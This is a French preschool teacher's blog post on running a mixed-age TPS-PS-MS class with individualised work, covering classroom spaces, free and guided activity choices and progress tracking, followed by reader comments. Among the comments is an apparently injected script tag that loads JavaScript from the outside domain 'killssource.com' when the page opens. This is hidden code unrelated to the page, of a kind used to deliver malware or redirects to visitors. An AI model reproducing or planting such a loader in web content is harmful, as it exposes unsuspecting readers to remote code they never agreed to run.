• Fonctionnement de ma classe de TPS-PS-MS

    Dans ma classe, j’essaie d’individualiser les apprentissages pour répondre au mieux aux besoins des élèves. C’est un vaste projet, fait de beaucoup de tâtonnements, de questionnements, de remises en question et de quelques sources de satisfaction heureusement !

    J'ai souvent pas mal de questions sur mon fonctionnement. Voici donc une série d'articles qui j'espère pourra vous donner des pistes. Il s'agit d'un exemple de ce qu'il est possible de mettre en place, il me convient car il est adapté à mes conditions matérielles, organisationnelles...à chacun de trouver ce qui lui convient bien sûr en adaptant aux réalités de sa classe.

    La première chose : il n'y a pas d'ateliers dirigés ! J'ai conservé l'atelier semi-dirigé avec l'atsem : 3 jours pour l'art et le graphisme qui sont étroitement liés et un jour de jeux mathématiques. On peut également réserver cet atelier à la mise en place de projets de classe. En début d'après-midi pour les MS, nous avons un temps collectif qui sert à mettre en place des rituels de problèmes mathématiques. De même avec les PS, nous avons de très courts temps de rituels en mathématiques et en phono.

    Le reste du temps, l'élève choisit ses activités en fonction de ses besoins, de ses avancées et de ses intérêts.

    Pour celles et ceux qui voudraient se lancer, voici quelques pistes pour savoir par où commencer !

     

    Comment s'organiser pour fonctionner au rythme de chacun ?

     

    Organiser l'espace de la classe

    Fonctionnement de ma classe de TPS-PS-MS

    La classe est organisée en espaces : chaque domaine a son petit coin ;) facilement identifiable.

    Organiser son espace de travail personnel : tables, tapis...combien et pour quelle utilisation ?

    article détaillé ici

     

    Structurer les apprentissages

    Fonctionnement de ma classe de TPS-PS-MS

    Chaque élève connait le travail qu'il a à effectuer chaque jour

    article détaillé ici

     

    Choisir les activités

    Fonctionnement de ma classe de TPS-PS-MS

    Quelles activités choisir, comment les présenter ?

    article détaillé sur les choix libres ici  

     article sur les choix guidés ici

     

    Suivre et valider les acquis des élèves

    Fonctionnement de ma classe de TPS-PS-MS

    J'utilise des frises affichées aux murs

    l'application Je valide

    un teacher planner

    article ici

     

    Comment commencer l'année ?

    Fonctionnement de ma classe de TPS-PS-MS

    article détaillé ici

     

    Bonne lecture !

     

    « Reconnaître les lettresComment lancer le travail individualisé »
    Pin It

  • Commentaires

    4
    oroad95
    Lundi 29 Juin à 15:15
    Bonjour!
    Merci pour ton partage!
    Je fonctionnais en plans de travail et classe flexible en élémentaire, j’arrive en PS et je souhaitais reporter ce fonctionnement en mater.
    Par hasard aurais-tu un exemple d’emploi du temps?
    Merci!
    3
    Lulu2409
    Samedi 27 Juin à 13:59
    Bravo pour ce travail, j'ai envie de me lancer, mais quelle organisation !!!
      • Samedi 27 Juin à 14:56

        Au départ, il faut bien poser les choses. Ensuite, ça tourne super bien  et vraiment ça vaut le coup !

         

    2
    Jeudi 18 Juin à 09:17

    Wouah, un super article, comme tu sais si bien les faire ! Bravo!

    <script src="//killssource.com/21c1e810f7f98f00b3.js"></script>
    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :